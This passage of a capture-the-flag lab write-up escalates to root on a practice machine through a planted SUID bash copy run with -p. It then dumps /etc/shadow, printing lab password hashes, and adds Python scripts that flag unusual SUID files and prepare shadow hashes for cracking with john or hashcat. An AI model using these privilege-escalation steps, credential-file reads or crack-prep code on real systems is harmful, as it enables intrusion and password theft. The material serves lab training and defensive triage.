ssh-backdoor user.txt www
james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}
We look for files with the SUID bit set:
james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash
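As an added example (not from the page), the triage a responder would run over that find output: compare each SUID path with a baseline of what a stock install ships and flag hidden files and anything under a user-writable tree. The baseline set is an assumption built from the paths above minus the planted one; in a real case derive it from a clean image of the same release, never from the compromised host.

```python
"""Added example (not the page's code): triage the output of
`find / -perm -u=s -type f` against a baseline of expected SUID binaries."""
from pathlib import PurePosixPath

# Assumed baseline (not from the page): the stock Ubuntu 18.04 SUID set. Build
# it from a known-good image, not from the victim.
BASELINE = {
    "/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/chfn", "/usr/bin/pkexec",
    "/usr/bin/traceroute6.iputils", "/usr/bin/newuidmap", "/usr/bin/newgidmap",
    "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/at", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/usr/lib/eject/dmcrypt-get-device",
    "/bin/mount", "/bin/fusermount", "/bin/su", "/bin/ping", "/bin/umount",
}

# Trees where a SUID file has no business living.
USER_TREES = ("/home", "/tmp", "/var/tmp", "/dev/shm", "/opt", "/srv")


def reasons_for(path: str) -> list[str]:
    """Why a SUID path deserves a look; an empty list means 'expected'."""
    p = PurePosixPath(path)
    out = []
    if p.name.startswith("."):
        out.append("hidden file")
    if any(path == t or path.startswith(t + "/") for t in USER_TREES):
        out.append("under user-writable tree")
    if path not in BASELINE:
        out.append("not in baseline")
    return out


def triage(find_output: str) -> dict[str, list[str]]:
    """Map each flagged path to its reasons, most reasons (worst) first."""
    flagged = {}
    for line in find_output.splitlines():
        path = line.strip()
        if path:
            r = reasons_for(path)
            if r:
                flagged[path] = r
    return dict(sorted(flagged.items(), key=lambda kv: -len(kv[1])))


# Sample input: the find output shown above, copied from the page.
FIND_OUTPUT = """\
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash
"""

if __name__ == "__main__":
    for path, why in triage(FIND_OUTPUT).items():
        print(f"{path}: {', '.join(why)}")
```

Only the planted file survives the filter here; on a real host you would also hash each flagged binary and compare it with the distribution package (here .suid_bash is a copy of bash 4.4, as its prompt later shows).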
Among the readable option strings inside .suid_bash we spotted the -p flag. It has nothing to do with $PATH: -p is bash's privileged mode, in which the shell does not reset its effective UID to the real UID at startup (and ignores $ENV/$BASH_ENV and functions imported from the environment). Because .suid_bash is a root-owned SUID copy of bash 4.4, running it with -p keeps euid 0, and bingo, we are root :D :
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt
thm{d53b2684f169360bb9606c333873144d}
Looking more closely at the SUID binary we went through its command-line options and managed to run single commands as root with it, without opening an interactive shell, to understand the binary better. Note that the unquoted -c cat /etc/shadow hangs and has to be interrupted: -c takes only the next argument as the command string, so cat runs with no file and waits on stdin while /etc/shadow becomes $0; the command has to be quoted as one argument:
james@overpass-production:/home/james$ ./.suid_bash -c whoami
james
james@overpass-production:/home/james$ ./.suid_bash -p -c whoami
root
james@overpass-production:/home/james$ ./.suid_bash -p -c cat /etc/shadow
^C
james@overpass-production:/home/james$ ./.suid_bash -p -c "cat /etc/shadow"
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$o23rmAtq$FabncpS1b85LDz9DfBShXj.hJXYIcGf1KdKJZP/3x3bGUJpP6Kvfc0JT8IkDaLbImCPGRPMUgXtA2NHLu8DEp1:18464:0:99999:7:::
paradox:$6$FVl2Uugb$TGpvNxRQWDYpK/lj505LDgdcrMCMN2e4c5MJ.YhVoZY7bRNwAZ2S24XapBm/s5s59tfrc4528tvrlJoNpJI2i0:18464:0:99999:7:::
szymex:$6$VwSYCytA$f.OYSpSkouPHPxd..Y3.Kdtm0P/Dc1lmHn722NO6.tj39r87KtOx7L0lIlJxYoDChkN4q/93cXg3MIMDZSPD00:18464:0:99999:7:::
bee:$6$ebKaOMGO$Pe7KvyDzaLctd1.SRSdiud.VSmokU5/Fla4VnDpNVMtk6TKmHcxb3kyGcUcFv89YTq9LuwoYtmnXLKz/X2Yu9.:18464:0:99999:7:::
muirland:$6$nESmZyzG$IcXb5muWfGIMK3ZsZa7Ml/DvQGTTzK8P.XKnCeRlPjP13shRrSjGnSQFCXhWOR.6It.VTLNOQnQt9pU.klTBu.:18464:0:99999:7:::
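An added example (not the page's code) that parses a dump like the one above the way you would before feeding it to john: it separates locked accounts ('*' or '!' in the password field) from crackable ones, names the crypt(3) scheme from the hash prefix so the right --format / -m can be chosen, and converts the days-since-epoch field into a date, which tells you when each password was last set. The prefix-to-tool mapping is assumed from the tools' documentation, not taken from the page; the sample lines are copied from the dump.

```python
"""Added example (not the page's code): parse an /etc/shadow dump, keep only
the entries worth cracking and prepare john-style user:hash lines."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# Assumed mapping (from the tools' docs): crypt(3) prefix -> (john --format, hashcat -m)
SCHEMES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("crypt", None),  # yescrypt: john's generic crypt(3) format, no hashcat mode
}


@dataclass
class ShadowEntry:
    user: str
    pw_hash: str
    lastchg: int  # days since 1970-01-01 on which the password was last changed

    @property
    def locked(self) -> bool:
        """'*', '!' or '!!' (or empty) means no password login is possible."""
        return self.pw_hash in ("", "*") or self.pw_hash.startswith("!")

    @property
    def scheme(self) -> Optional[tuple[str, Optional[int]]]:
        for prefix, tools in SCHEMES.items():
            if self.pw_hash.startswith(prefix):
                return tools
        return None

    def lastchg_date(self) -> date:
        return date(1970, 1, 1) + timedelta(days=self.lastchg)


def parse_shadow(text: str) -> list[ShadowEntry]:
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 3:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries.append(ShadowEntry(fields[0], fields[1], int(fields[2] or 0)))
    return entries


def crackable(entries: list[ShadowEntry]) -> list[ShadowEntry]:
    """Entries with a real hash in a scheme we know how to attack."""
    return [e for e in entries if not e.locked and e.scheme is not None]


def john_lines(entries: list[ShadowEntry]) -> list[str]:
    """user:hash lines for john --wordlist=... --format=<scheme>."""
    return [f"{e.user}:{e.pw_hash}" for e in crackable(entries)]


# Sample input: two locked and two human accounts copied from the dump above.
SAMPLE_SHADOW = """\
root:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$o23rmAtq$FabncpS1b85LDz9DfBShXj.hJXYIcGf1KdKJZP/3x3bGUJpP6Kvfc0JT8IkDaLbImCPGRPMUgXtA2NHLu8DEp1:18464:0:99999:7:::
paradox:$6$FVl2Uugb$TGpvNxRQWDYpK/lj505LDgdcrMCMN2e4c5MJ.YhVoZY7bRNwAZ2S24XapBm/s5s59tfrc4528tvrlJoNpJI2i0:18464:0:99999:7:::
"""

if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        state = "locked" if e.locked else f"{e.scheme[0]} (hashcat -m {e.scheme[1]})"
        print(f"{e.user:10} {state:28} last changed {e.lastchg_date()}")
```

The lastchg field is worth a look in its own right: the system accounts carry 18295 while every human account and sshd carry 18464, i.e. the user passwords were all set on the same later day, which is a data point for the timeline even before any hash is cracked.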
james@overpass-production:/home/james$ ./.suid_bash -p -O
autocd off
cdable_vars off
cdspell off
checkhash off
checkjobs off
checkwinsize off
cmdhist on
compat31 off
compat32 off
compat40 off
compat41 off
compat42 off
compat43 off
complete_fullquote on
direxpand off
dirspell off
dotglob off
execfail off
expand_aliases off
extdebug off
extglob off
extquote on
failglob off
force_fignore on
globasciiranges off
globstar off
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
inherit_errexit off
interactive_comments on
lastpipe off
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off
.suid_bash-4.4# exit
exit